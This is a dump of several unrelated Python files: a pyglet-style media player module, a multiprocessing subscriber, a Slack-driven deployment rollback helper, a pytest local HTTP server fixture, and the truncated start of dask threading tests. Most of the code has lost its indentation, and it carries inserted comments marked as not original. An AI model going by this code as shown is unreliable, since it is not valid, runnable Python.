Not all source durations can be determined; in this case the value
is None.
Read-only.
:type: float
''')
def play(self):
'''Play the source.
This is a convenience method which creates a ManagedSoundPlayer for
this source and plays it immediately.
:rtype: `ManagedSoundPlayer`
'''
player = ManagedSoundPlayer()
player.queue(self)
player.play()
return player
def get_animation(self):
'''Import all video frames into memory as an `Animation`.
An empty animation will be returned if the source has no video.
Otherwise, the animation will contain all unplayed video frames (the
entire source, if it has not been queued on a player). After creating
the animation, the source will be at EOS.
This method is unsuitable for videos running longer than a
few seconds.
:since: pyglet 1.1
:rtype: `pyglet.image.Animation`
'''
from pyglet.image import Animation, AnimationFrame
if not self.video_format:
return Animation([])
else:
frames = []
last_ts = 0
next_ts = self.get_next_video_timestamp()
while next_ts is not None:
image = self.get_next_video_frame()
if image is not None:
delay = next_ts - last_ts
frames.append(AnimationFrame(image, delay))
last_ts = next_ts
next_ts = self.get_next_video_timestamp()
return Animation(frames)
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:since: pyglet 1.1
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
pass
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:since: pyglet 1.1
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
pass
# Internal methods that SourceGroup calls on the source:
def seek(self, timestamp):
'''Seek to given timestamp.'''
raise CannotSeekException()
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
return self
def get_audio_data(self, bytes):
'''Get next packet of audio data.
:Parameters:
`bytes` : int
Maximum number of bytes of data to return.
:rtype: `AudioData`
:return: Next packet of audio data, or None if there is no (more)
data.
'''
return None
class StreamingSource(Source):
'''A source that is decoded as it is being played, and can only be
queued once.
'''
_is_queued = False
is_queued = property(lambda self: self._is_queued,
doc='''Determine if this source has been queued
on a `Player` yet.
Read-only.
:type: bool
''')
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
if self._is_queued:
raise MediaException('This source is already queued on a player.')
self._is_queued = True
return self
class StaticSource(Source):
'''A source that has been completely decoded in memory. This source can
be queued onto multiple players any number of times.
'''
def __init__(self, source):
'''Construct a `StaticSource` for the data in `source`.
:Parameters:
`source` : `Source`
The source to read and decode audio and video data from.
'''
source = source._get_queue_source()
if source.video_format:
raise NotImplementedError(
'Static sources not supported for video yet.')
self.audio_format = source.audio_format
if not self.audio_format:
return
# Arbitrary: number of bytes to request at a time.
buffer_size = 1 << 20 # 1 MB
# Naive implementation. Driver-specific implementations may override
# to load static audio data into device (or at least driver) memory.
data = StringIO.StringIO()
while True:
audio_data = source.get_audio_data(buffer_size)
if not audio_data:
break
data.write(audio_data.get_string_data())
self._data = data.getvalue()
self._duration = len(self._data) / \
float(self.audio_format.bytes_per_second)
def _get_queue_source(self):
return StaticMemorySource(self._data, self.audio_format)
def get_audio_data(self, bytes):
raise RuntimeError('StaticSource cannot be queued.')
class StaticMemorySource(StaticSource):
'''Helper class for default implementation of `StaticSource`. Do not use
directly.'''
def __init__(self, data, audio_format):
'''Construct a memory source over the given data buffer.
'''
self._file = StringIO.StringIO(data)
self._max_offset = len(data)
self.audio_format = audio_format
self._duration = len(data) / float(audio_format.bytes_per_second)
def seek(self, timestamp):
offset = int(timestamp * self.audio_format.bytes_per_second)
# Align to sample
if self.audio_format.bytes_per_sample == 2:
offset &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
offset &= 0xfffffffc
self._file.seek(offset)
def get_audio_data(self, bytes):
offset = self._file.tell()
timestamp = float(offset) / self.audio_format.bytes_per_second
# Align to sample size
if self.audio_format.bytes_per_sample == 2:
bytes &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
bytes &= 0xfffffffc
data = self._file.read(bytes)
if not len(data):
return None
duration = float(len(data)) / self.audio_format.bytes_per_second
return AudioData(data, len(data), timestamp, duration, [])
class SourceGroup(object):
'''Read data from a queue of sources, with support for looping. All
sources must share the same audio format.
:Ivariables:
`audio_format` : `AudioFormat`
Required audio format for queued sources.
'''
# TODO can sources list go empty? what behaviour (ignore or error)?
_advance_after_eos = False
_loop = False
def __init__(self, audio_format, video_format):
self.audio_format = audio_format
self.video_format = video_format
self.duration = 0.
self._timestamp_offset = 0.
self._dequeued_durations = []
self._sources = []
def seek(self, time):
if self._sources:
self._sources[0].seek(time)
def queue(self, source):
source = source._get_queue_source()
assert(source.audio_format == self.audio_format)
self._sources.append(source)
self.duration += source.duration
def has_next(self):
return len(self._sources) > 1
def next(self, immediate=True):
if immediate:
self._advance()
else:
self._advance_after_eos = True
def get_current_source(self):
if self._sources:
return self._sources[0]
def _advance(self):
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
old_source = self._sources.pop(0)
self.duration -= old_source.duration
def _get_loop(self):
return self._loop
def _set_loop(self, loop):
self._loop = loop
loop = property(_get_loop, _set_loop,
doc='''Loop the current source indefinitely or until
`next` is called. Initially False.
:type: bool
''')
def get_audio_data(self, bytes):
'''Get next audio packet.
:Parameters:
`bytes` : int
Hint for preferred size of audio packet; may be ignored.
:rtype: `AudioData`
:return: Audio data, or None if there is no more data.
'''
data = self._sources[0].get_audio_data(bytes)
eos = False
while not data:
eos = True
if self._loop and not self._advance_after_eos:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
self._sources[0].seek(0)
else:
self._advance_after_eos = False
# Advance source if there's something to advance to.
# Otherwise leave last source paused at EOS.
if len(self._sources) > 1:
self._advance()
else:
return None
data = self._sources[0].get_audio_data(bytes) # TODO method rename
data.timestamp += self._timestamp_offset
if eos:
if _debug:
print 'adding on_eos event to audio data'
data.events.append(MediaEvent(0, 'on_eos'))
return data
def translate_timestamp(self, timestamp):
'''Get source-relative timestamp for the audio player's timestamp.'''
# XXX
if timestamp is None:
return None
timestamp = timestamp - self._timestamp_offset
if timestamp < 0:
for duration in self._dequeued_durations[::-1]:
timestamp += duration
if timestamp > 0:
break
assert timestamp >= 0, 'Timestamp beyond dequeued source memory'
return timestamp
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
# TODO track current video source independently from audio source for
# better prebuffering.
timestamp = self._sources[0].get_next_video_timestamp()
if timestamp is not None:
timestamp += self._timestamp_offset
return timestamp
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
return self._sources[0].get_next_video_frame()
class AbstractAudioPlayer(object):
'''Base class for driver audio players.
'''
def __init__(self, source_group, player):
'''Create a new audio player.
:Parameters:
`source_group` : `SourceGroup`
Source group to play from.
`player` : `Player`
Player to receive EOS and video frame sync events.
'''
self.source_group = source_group
self.player = player
def play(self):
'''Begin playback.'''
raise NotImplementedError('abstract')
def stop(self):
'''Stop (pause) playback.'''
raise NotImplementedError('abstract')
def delete(self):
'''Stop playing and clean up all resources used by player.'''
raise NotImplementedError('abstract')
def _play_group(self, audio_players):
'''Begin simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.play()
def _stop_group(self, audio_players):
'''Stop simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
            player.stop()
def clear(self):
'''Clear all buffered data and prepare for replacement data.
The player should be stopped before calling this method.
'''
raise NotImplementedError('abstract')
def get_time(self):
'''Return approximation of current playback time within current source.
Returns ``None`` if the audio player does not know what the playback
time is (for example, before any valid audio data has been read).
:rtype: float
:return: current play cursor time, in seconds.
'''
# TODO determine which source within group
raise NotImplementedError('abstract')
def set_volume(self, volume):
'''See `Player.volume`.'''
pass
def set_position(self, position):
'''See `Player.position`.'''
pass
def set_min_distance(self, min_distance):
'''See `Player.min_distance`.'''
pass
def set_max_distance(self, max_distance):
'''See `Player.max_distance`.'''
pass
def set_pitch(self, pitch):
'''See `Player.pitch`.'''
pass
def set_cone_orientation(self, cone_orientation):
'''See `Player.cone_orientation`.'''
pass
def set_cone_inner_angle(self, cone_inner_angle):
'''See `Player.cone_inner_angle`.'''
pass
def set_cone_outer_angle(self, cone_outer_angle):
'''See `Player.cone_outer_angle`.'''
pass
def set_cone_outer_gain(self, cone_outer_gain):
'''See `Player.cone_outer_gain`.'''
pass
class Player(pyglet.event.EventDispatcher):
'''High-level sound and video player.
'''
_last_video_timestamp = None
_texture = None
    # Spatialisation attributes, preserved between audio players
_volume = 1.0
_min_distance = 1.0
_max_distance = 100000000.
_position = (0, 0, 0)
_pitch = 1.0
_cone_orientation = (0, 0, 1)
_cone_inner_angle = 360.
_cone_outer_angle = 360.
_cone_outer_gain = 1.
#: The player will pause when it reaches the end of the stream.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_PAUSE = 'pause'
    #: The player will loop the current stream continuously.
#:
#: :deprecated: Use `SourceGroup.loop`
EOS_LOOP = 'loop'
#: The player will move on to the next queued stream when it reaches the
#: end of the current source. If there is no source queued, the player
#: will pause.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_NEXT = 'next'
#: The player will stop entirely; valid only for ManagedSoundPlayer.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_STOP = 'stop'
#: :deprecated:
_eos_action = EOS_NEXT
def __init__(self):
# List of queued source groups
self._groups = []
self._audio_player = None
# Desired play state (not an indication of actual state).
self._playing = False
self._paused_time = 0.0
def queue(self, source):
if (self._groups and
source.audio_format == self._groups[-1].audio_format and
source.video_format == self._groups[-1].video_format):
self._groups[-1].queue(source)
else:
group = SourceGroup(source.audio_format, source.video_format)
group.queue(source)
self._groups.append(group)
self._set_eos_action(self._eos_action)
self._set_playing(self._playing)
def _set_playing(self, playing):
#stopping = self._playing and not playing
#starting = not self._playing and playing
self._playing = playing
source = self.source
if playing and source:
if not self._audio_player:
self._create_audio_player()
self._audio_player.play()
if source.video_format:
if not self._texture:
self._create_texture()
if self.source.video_format.frame_rate:
period = 1. / self.source.video_format.frame_rate
else:
period = 1. / 30.
if _profile:
pyglet.clock.schedule(lambda dt: None)
else:
pyglet.clock.schedule_interval(self.update_texture, period)
else:
if self._audio_player:
self._audio_player.stop()
pyglet.clock.unschedule(self.update_texture)
def play(self):
self._set_playing(True)
def pause(self):
self._set_playing(False)
if self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is not None:
self._paused_time = time
self._audio_player.stop()
def next(self):
if not self._groups:
return
group = self._groups[0]
if group.has_next():
group.next()
return
if self.source.video_format:
self._texture = None
pyglet.clock.unschedule(self.update_texture)
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
del self._groups[0]
if self._groups:
self._set_playing(self._playing)
return
self._set_playing(False)
self.dispatch_event('on_player_eos')
def seek(self, time):
if _debug:
print 'Player.seek(%r)' % time
self._paused_time = time
self.source.seek(time)
if self._audio_player: self._audio_player.clear()
if self.source.video_format:
self._last_video_timestamp = None
self.update_texture(time=time)
def _create_audio_player(self):
assert not self._audio_player
assert self._groups
group = self._groups[0]
audio_format = group.audio_format
if audio_format:
audio_driver = get_audio_driver()
else:
audio_driver = get_silent_audio_driver()
self._audio_player = audio_driver.create_audio_player(group, self)
_class = self.__class__
def _set(name):
private_name = '_' + name
value = getattr(self, private_name)
if value != getattr(_class, private_name):
getattr(self._audio_player, 'set_' + name)(value)
_set('volume')
_set('min_distance')
_set('max_distance')
_set('position')
_set('pitch')
_set('cone_orientation')
_set('cone_inner_angle')
_set('cone_outer_angle')
_set('cone_outer_gain')
def _get_source(self):
if not self._groups:
return None
return self._groups[0].get_current_source()
source = property(_get_source)
playing = property(lambda self: self._playing)
def _get_time(self):
time = None
if self._playing and self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is None:
return self._paused_time
else:
return time
time = property(_get_time)
def _create_texture(self):
video_format = self.source.video_format
self._texture = pyglet.image.Texture.create(
video_format.width, video_format.height, rectangle=True)
self._texture = self._texture.get_transform(flip_y=True)
self._texture.anchor_y = 0
def get_texture(self):
return self._texture
def seek_next_frame(self):
'''Step forwards one video frame in the current Source.
'''
time = self._groups[0].get_next_video_timestamp()
if time is None:
return
self.seek(time)
def update_texture(self, dt=None, time=None):
if _profile:
ts = 0
else:
if time is None:
time = self._audio_player.get_time()
if time is None:
return
if (self._last_video_timestamp is not None and
time <= self._last_video_timestamp):
return
ts = self._groups[0].get_next_video_timestamp()
while ts is not None and ts < time:
self._groups[0].get_next_video_frame() # Discard frame
ts = self._groups[0].get_next_video_timestamp()
if ts is None:
self._last_video_timestamp = None
return
image = self._groups[0].get_next_video_frame()
if image is not None:
if self._texture is None:
self._create_texture()
self._texture.blit_into(image, 0, 0, 0)
self._last_video_timestamp = ts
def _set_eos_action(self, eos_action):
''':deprecated:'''
assert eos_action in (self.EOS_NEXT, self.EOS_STOP,
self.EOS_PAUSE, self.EOS_LOOP)
self._eos_action = eos_action
for group in self._groups:
group.loop = eos_action == self.EOS_LOOP
group.advance_after_eos = eos_action == self.EOS_NEXT
eos_action = property(lambda self: self._eos_action,
_set_eos_action,
doc='''Set the behaviour of the player when it
reaches the end of the current source.
This must be one of the constants `EOS_NEXT`, `EOS_PAUSE`, `EOS_STOP` or
`EOS_LOOP`.
:deprecated: Use `SourceGroup.loop` and `SourceGroup.advance_after_eos`
:type: str
''')
def _player_property(name, doc=None):
private_name = '_' + name
set_name = 'set_' + name
def _player_property_set(self, value):
setattr(self, private_name, value)
if self._audio_player:
getattr(self._audio_player, set_name)(value)
def _player_property_get(self):
return getattr(self, private_name)
return property(_player_property_get, _player_property_set, doc=doc)
# TODO docstrings for these...
volume = _player_property('volume')
min_distance = _player_property('min_distance')
max_distance = _player_property('max_distance')
position = _player_property('position')
pitch = _player_property('pitch')
cone_orientation = _player_property('cone_orientation')
cone_inner_angle = _player_property('cone_inner_angle')
cone_outer_angle = _player_property('cone_outer_angle')
cone_outer_gain = _player_property('cone_outer_gain')
# Events
def on_player_eos(self):
'''The player ran out of sources.
:event:
'''
if _debug:
print 'Player.on_player_eos'
def on_source_group_eos(self):
'''The current source group ran out of data.
The default behaviour is to advance to the next source group if
possible.
:event:
'''
self.next()
if _debug:
print 'Player.on_source_group_eos'
def on_eos(self):
'''
:event:
'''
if _debug:
print 'Player.on_eos'
Player.register_event_type('on_eos')
Player.register_event_type('on_player_eos')
Player.register_event_type('on_source_group_eos')
class ManagedSoundPlayer(Player):
''':deprecated: Use `Player`'''
pass
class PlayerGroup(object):
'''Group of players that can be played and paused simultaneously.
:Ivariables:
`players` : list of `Player`
Players in this group.
'''
def __init__(self, players):
'''Create a player group for the given set of players.
All players in the group must currently not belong to any other
group.
:Parameters:
`players` : Sequence of `Player`
Players to add to this group.
'''
self.players = list(players)
def play(self):
'''Begin playing all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._play_group(audio_players)
for player in self.players:
player.play()
def pause(self):
'''Pause all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._stop_group(audio_players)
for player in self.players:
player.pause()
class AbstractAudioDriver(object):
def create_audio_player(self, source_group, player):
raise NotImplementedError('abstract')
def get_listener(self):
raise NotImplementedError('abstract')
class AbstractListener(object):
'''The listener properties for positional audio.
You can obtain the singleton instance of this class by calling
`AbstractAudioDriver.get_listener`.
'''
_volume = 1.0
_position = (0, 0, 0)
_forward_orientation = (0, 0, -1)
_up_orientation = (0, 1, 0)
def _set_volume(self, volume):
raise NotImplementedError('abstract')
volume = property(lambda self: self._volume,
lambda self, volume: self._set_volume(volume),
doc='''The master volume for sound playback.
All sound volumes are multiplied by this master volume before being
played. A value of 0 will silence playback (but still consume
resources). The nominal volume is 1.0.
:type: float
''')
def _set_position(self, position):
raise NotImplementedError('abstract')
position = property(lambda self: self._position,
lambda self, position: self._set_position(position),
doc='''The position of the listener in 3D space.
The position is given as a tuple of floats (x, y, z). The unit
defaults to meters, but can be modified with the listener
properties.
:type: 3-tuple of float
''')
def _set_forward_orientation(self, orientation):
raise NotImplementedError('abstract')
forward_orientation = property(lambda self: self._forward_orientation,
lambda self, o: self._set_forward_orientation(o),
doc='''A vector giving the direction the
listener is facing.
The orientation is given as a tuple of floats (x, y, z), and has
        no unit. The forward orientation should be orthogonal to the
up orientation.
:type: 3-tuple of float
''')
def _set_up_orientation(self, orientation):
raise NotImplementedError('abstract')
up_orientation = property(lambda self: self._up_orientation,
lambda self, o: self._set_up_orientation(o),
doc='''A vector giving the "up" orientation
of the listener.
The orientation is given as a tuple of floats (x, y, z), and has
        no unit. The up orientation should be orthogonal to the
forward orientation.
:type: 3-tuple of float
''')
class _LegacyListener(AbstractListener):
def _set_volume(self, volume):
get_audio_driver().get_listener().volume = volume
self._volume = volume
def _set_position(self, position):
get_audio_driver().get_listener().position = position
self._position = position
def _set_forward_orientation(self, forward_orientation):
get_audio_driver().get_listener().forward_orientation = \
forward_orientation
self._forward_orientation = forward_orientation
def _set_up_orientation(self, up_orientation):
get_audio_driver().get_listener().up_orientation = up_orientation
self._up_orientation = up_orientation
#: The singleton `AbstractListener` object.
#:
#: :deprecated: Use `AbstractAudioDriver.get_listener`
#:
#: :type: `AbstractListener`
listener = _LegacyListener()
class AbstractSourceLoader(object):
def load(self, filename, file):
raise NotImplementedError('abstract')
class AVbinSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import avbin
return avbin.AVbinSource(filename, file)
class RIFFSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import riff
return riff.WaveSource(filename, file)
def load(filename, file=None, streaming=True):
'''Load a source from a file.
Currently the `file` argument is not supported; media files must exist
as real paths.
:Parameters:
`filename` : str
Filename of the media file to load.
`file` : file-like object
Not yet supported.
`streaming` : bool
If False, a `StaticSource` will be returned; otherwise (default) a
`StreamingSource` is created.
:rtype: `Source`
'''
source = get_source_loader().load(filename, file)
if not streaming:
source = StaticSource(source)
return source
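# Hedged examples (not in the original source): typical uses of `load`.  The
# file names are placeholders.  `streaming=False` wraps the source in a
# StaticSource, which decodes everything up front and suits short, frequently
# replayed sounds; the default returns a StreamingSource for long media.
#
#     music = load('background.ogg')              # StreamingSource
#     click = load('click.wav', streaming=False)  # StaticSource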
def get_audio_driver():
global _audio_driver
if _audio_driver:
return _audio_driver
_audio_driver = None
for driver_name in pyglet.options['audio']:
try:
if driver_name == 'pulse':
from drivers import pulse
_audio_driver = pulse.create_audio_driver()
break
elif driver_name == 'openal':
from drivers import openal
_audio_driver = openal.create_audio_driver()
break
elif driver_name == 'directsound':
from drivers import directsound
_audio_driver = directsound.create_audio_driver()
break
elif driver_name == 'silent':
_audio_driver = get_silent_audio_driver()
break
except:
if _debug:
print 'Error importing driver %s' % driver_name
return _audio_driver
def get_silent_audio_driver():
global _silent_audio_driver
if not _silent_audio_driver:
from drivers import silent
_silent_audio_driver = silent.create_audio_driver()
return _silent_audio_driver
_audio_driver = None
_silent_audio_driver = None
def get_source_loader():
global _source_loader
if _source_loader:
return _source_loader
try:
import avbin
_source_loader = AVbinSourceLoader()
except ImportError:
_source_loader = RIFFSourceLoader()
return _source_loader
_source_loader = None
try:
import avbin
have_avbin = True
except ImportError:
have_avbin = False
|
MPSubscriber.py
|
from dppy.behavioral import pubsub
from multiprocessing import Process, SimpleQueue
class MPSubscriber(pubsub.AbsSubscriber):
def __init__(self, client, worker):
self._client = client
self._client.attach(self)
self.q = SimpleQueue()
Process(target=worker, args=(self.q,)).start()
def update(self, o):
self.q.put(o)
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_value, traceback):
self._client.detach(self)
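# Hedged usage sketch (not in the original file): assuming the dppy pubsub
# client exposes attach/detach/notify as used above, a worker process drains
# the queue that update() fills.  The publisher class name is a placeholder.
#
#     def worker(q):
#         while True:
#             print('received', q.get())
#
#     client = pubsub.Provider()          # placeholder publisher name
#     sub = MPSubscriber(client, worker)
#     client.notify('hello')              # update() forwards it to the worker process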
|
automatic_rollbacks.py
|
import abc
import asyncio
import json
import logging
from multiprocessing import Process
from multiprocessing import Queue
from queue import Empty
from typing import Collection
from typing import Iterator
from typing import Mapping
from typing import TYPE_CHECKING
import requests
import transitions.extensions
from mypy_extensions import TypedDict
try:
from scribereader import scribereader
except ImportError:
scribereader = None
SLACK_WEBHOOK_STREAM = 'stream_slack_incoming_webhook'
SCRIBE_ENV = 'uswest1-prod'
log = logging.getLogger(__name__)
def get_slack_blocks_for_deployment(
message,
last_action=None,
status=None,
progress=None,
active_button=None,
available_buttons=["rollback", "forward"],
from_sha=None,
to_sha=None,
):
button_elements = get_button_elements(
available_buttons, active_button=active_button,
from_sha=from_sha, to_sha=to_sha,
)
blocks = [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": message,
},
},
{"type": "divider"},
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": f"State machine: `{status}`\nProgress: {progress}\nLast operator action: {last_action}",
},
},
]
if button_elements != []:
blocks.append({
"type": "actions",
"block_id": "deployment_actions",
"elements": button_elements,
})
return blocks
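# Hedged illustration (not in the original file): a typical call that builds
# Slack Block Kit JSON for a deployment message.  The SHAs and webhook URL are
# placeholders.
#
#     blocks = get_slack_blocks_for_deployment(
#         message="Deploying myservice",
#         last_action="start_deploy",
#         status="deploying",
#         progress="3/10 instances",
#         active_button=None,
#         from_sha="abc1234def",
#         to_sha="9876fedcba",
#     )
#     requests.post(SLACK_WEBHOOK_URL, json={"blocks": blocks})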
def get_button_element(button, is_active, from_sha, to_sha):
active_button_texts = {
"rollback": f"Rolling Back to {from_sha[:8]} :zombocom:",
"forward": f"Rolling Forward to {to_sha[:8]} :zombocom:",
}
inactive_button_texts = {
"rollback": f"Roll Back to {from_sha[:8]} :arrow_backward:",
"forward": f"Continue Forward to {to_sha[:8]} :arrow_forward:",
}
if is_active is True:
confirm = False
text = active_button_texts[button]
else:
confirm = get_confirmation_object(button)
text = inactive_button_texts[button]
element = {
"type": "button",
"text": {
"type": "plain_text",
"text": text,
"emoji": True,
},
"confirm": confirm,
"value": button,
}
if not confirm:
del element["confirm"]
return element
def get_button_elements(buttons, active_button=None, from_sha=None, to_sha=None):
elements = []
for button in buttons:
is_active = button == active_button
elements.append(
get_button_element(button=button, is_active=is_active, from_sha=from_sha, to_sha=to_sha),
)
return elements
def get_confirmation_object(action):
return {
"title": {
"type": "plain_text",
"text": "Are you sure?",
},
"text": {
"type": "mrkdwn",
"text": f"Did you mean to press {action}?",
},
"confirm": {
"type": "plain_text",
"text": "Yes. Do it!",
},
"deny": {
"type": "plain_text",
"text": "Stop, I've changed my mind!",
},
}
class ButtonPress():
def __init__(self, event):
self.event = event
self.username = event["user"]["username"]
self.response_url = event["response_url"]
# TODO: Handle multiple actions?
self.action = event["actions"][0]["value"]
self.thread_ts = event["container"].get("thread_ts", None)
self.channel = event["channel"]["name"]
    def __repr__(self):
        return repr(self.event)
def update(self, blocks):
        # Responds to a button press by POSTing to the interaction's response_url:
        # https://api.slack.com/messaging/interactivity/enabling#responding-to-interactions
        # Note this is not the Slack client's api_call method per se; see
        # https://github.com/slackapi/python-slackclient/issues/270
requests.post(self.response_url, json={"blocks": blocks})
def event_to_buttonpress(event):
return ButtonPress(event=event)
def parse_webhook_event_json(line):
event = json.loads(line)
log.debug(event)
return event
def is_relevant_event(event):
# TODO: Implement filtering
return True
def get_slack_events():
if scribereader is None:
logging.error("Scribereader unavailable. Not tailing slack events.")
return
def scribe_tail(queue):
host_and_port = scribereader.get_env_scribe_host(SCRIBE_ENV, True)
host = host_and_port['host']
port = host_and_port['port']
tailer = scribereader.get_stream_tailer(SLACK_WEBHOOK_STREAM, host, port)
for line in tailer:
queue.put(line)
# Tailing scribe is not thread-safe, therefore we must use a Multiprocess-Queue-based
# approach, with paasta logs as prior art.
queue = Queue()
kw = {'queue': queue}
process = Process(target=scribe_tail, daemon=True, kwargs=kw)
process.start()
while True:
try:
line = queue.get(block=True, timeout=0.1)
event = parse_webhook_event_json(line)
if is_relevant_event(event):
yield event
except Empty:
pass
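# Hedged consumption sketch (not in the original file): turning tailed webhook
# events into ButtonPress objects.
#
#     for event in get_slack_events():
#         press = event_to_buttonpress(event)
#         log.info("%s pressed %s in #%s", press.username, press.action, press.channel)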
class TransitionDefinition(TypedDict):
trigger: str
source: str
dest: str
class DeploymentProcess(abc.ABC):
if TYPE_CHECKING:
# These attributes need to be defined in this `if TYPE_CHECKING` block, because if they exist at runtime then
# transitions will refuse to overwrite them.
state: str
def trigger(self, *args, **kwargs):
...
def __init__(
self,
):
self.event_loop = asyncio.get_event_loop()
self.finished_event = asyncio.Event(loop=self.event_loop)
self.machine = transitions.extensions.LockedMachine(
model=self,
states=list(self.states()),
transitions=list(self.valid_transitions()),
initial=self.start_state(),
after_state_change=self.after_state_change,
queued=True,
)
@abc.abstractmethod
def status_code_by_state(self) -> Mapping[str, int]:
raise NotImplementedError()
@abc.abstractmethod
def states(self) -> Collection['str']:
raise NotImplementedError()
@abc.abstractmethod
def valid_transitions(self) -> Iterator[TransitionDefinition]:
raise NotImplementedError()
@abc.abstractmethod
def start_transition(self):
raise NotImplementedError()
@abc.abstractmethod
def start_state(self):
raise NotImplementedError()
def finish(self):
self.finished_event.set()
def run(self):
return self.event_loop.run_until_complete(self.run_async())
async def run_async(self) -> int:
self.trigger(self.start_transition())
await self.finished_event.wait()
return self.status_code_by_state().get(self.state, 3)
def after_state_change(self):
if self.state in self.status_code_by_state():
self.event_loop.call_soon_threadsafe(self.finished_event.set)
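# Hedged sketch (not in the original file): a minimal concrete DeploymentProcess.
# The states, triggers and exit codes below are invented for illustration only.
#
#     class ToyDeployment(DeploymentProcess):
#         def states(self):
#             return ["start", "deploying", "deployed"]
#         def valid_transitions(self):
#             yield {"trigger": "deploy", "source": "start", "dest": "deploying"}
#             yield {"trigger": "finish", "source": "deploying", "dest": "deployed"}
#         def start_state(self):
#             return "start"
#         def start_transition(self):
#             return "deploy"
#         def status_code_by_state(self):
#             return {"deployed": 0}
#         def after_state_change(self):
#             if self.state == "deploying":
#                 self.trigger("finish")     # immediately advance, for the toy example
#             super().after_state_change()
#
#     exit_code = ToyDeployment().run()      # 0 once the machine reaches "deployed"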
|
http_server.py
|
import threading
from collections import defaultdict
from http import HTTPStatus
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse
import pytest
class TestHandler(BaseHTTPRequestHandler):
handlers = defaultdict(dict)
@classmethod
def handler(cls, method, path):
def inner(func):
cls.handlers[method][path] = func
return func
return inner
def do_GET(self):
parse_result = urlparse(self.path)
func = self.handlers['GET'].get(parse_result.path)
if func is None:
return self.send_error(HTTPStatus.NOT_FOUND)
return func(self)
@TestHandler.handler('GET', '/headers')
def get_headers(handler):
handler.send_response(200)
for key, value in handler.headers.items():
handler.send_header(key, value)
handler.send_header('Content-Length', 0)
handler.end_headers()
@TestHandler.handler('GET', '/drip')
def chunked_drip(handler):
handler.send_response(200)
accept = handler.headers.get('Accept')
if accept is not None:
handler.send_header('Content-Type', accept)
handler.send_header('Transfer-Encoding', 'chunked')
handler.end_headers()
for _ in range(3):
body = 'test\n'
handler.wfile.write(f'{len(body):X}\r\n{body}\r\n'.encode('utf-8'))
handler.wfile.write('0\r\n\r\n'.encode('utf-8'))
@TestHandler.handler('GET', '/stream/encoding/random')
def random_encoding(handler):
from tests.fixtures import ASCII_FILE_CONTENT, FILE_CONTENT as UNICODE_FILE_CONTENT
handler.send_response(200)
handler.send_header('Transfer-Encoding', 'chunked')
handler.end_headers()
for body in [
ASCII_FILE_CONTENT,
ASCII_FILE_CONTENT,
UNICODE_FILE_CONTENT,
UNICODE_FILE_CONTENT,
UNICODE_FILE_CONTENT,
]:
body += "\n"
handler.wfile.write(f'{len(body.encode()):X}\r\n{body}\r\n'.encode())
handler.wfile.write('0\r\n\r\n'.encode('utf-8'))
@pytest.fixture(scope="function")
def http_server():
"""A custom HTTP server implementation for our tests, that is
built on top of the http.server module. Handy when we need to
deal with details which httpbin can not capture."""
server = HTTPServer(('localhost', 0), TestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
yield '{}:{}'.format(*server.socket.getsockname())
server.shutdown()
thread.join(timeout=0.5)
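# Hedged usage sketch (not in the original file): registering an extra route on
# TestHandler and exercising it through the fixture.  The `requests` import is
# an assumption about the test environment.
#
#     @TestHandler.handler('GET', '/ping')
#     def ping(handler):
#         body = b'pong'
#         handler.send_response(HTTPStatus.OK)
#         handler.send_header('Content-Length', str(len(body)))
#         handler.end_headers()
#         handler.wfile.write(body)
#
#     def test_ping(http_server):
#         import requests
#         assert requests.get(f'http://{http_server}/ping').text == 'pong'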
|
test_threaded.py
|
import os
import signal
import threading
from multiprocessing.pool import ThreadPool
from time import time, sleep
import pytest
import dask
from dask.system import CPU_COUNT
from dask.threaded import get
from dask.utils_test import inc, add
def test_get():
dsk = {"x": 1, "y": 2, "z": (inc, "x"), "w": (add, "z", "y")}
assert get(dsk, "w") == 4
assert get(dsk, ["w", "z"]) == (4, 2)
def test_nested_get():
dsk = {"x": 1, "y": 2, "a": (add, "x", "y"), "b": (sum, ["x", "y"])}
assert get(dsk, ["a", "b"]) == (3, 3)
def test_get_without_computation():
dsk = {"x": 1}
assert get(dsk, "x") == 1
def test_broken_callback():
from dask.callbacks import Callback
def _f_ok(*args, **kwargs):
pass
def _f_broken(*args, **kwargs):
raise ValueError("my_exception")
dsk = {"x": 1}
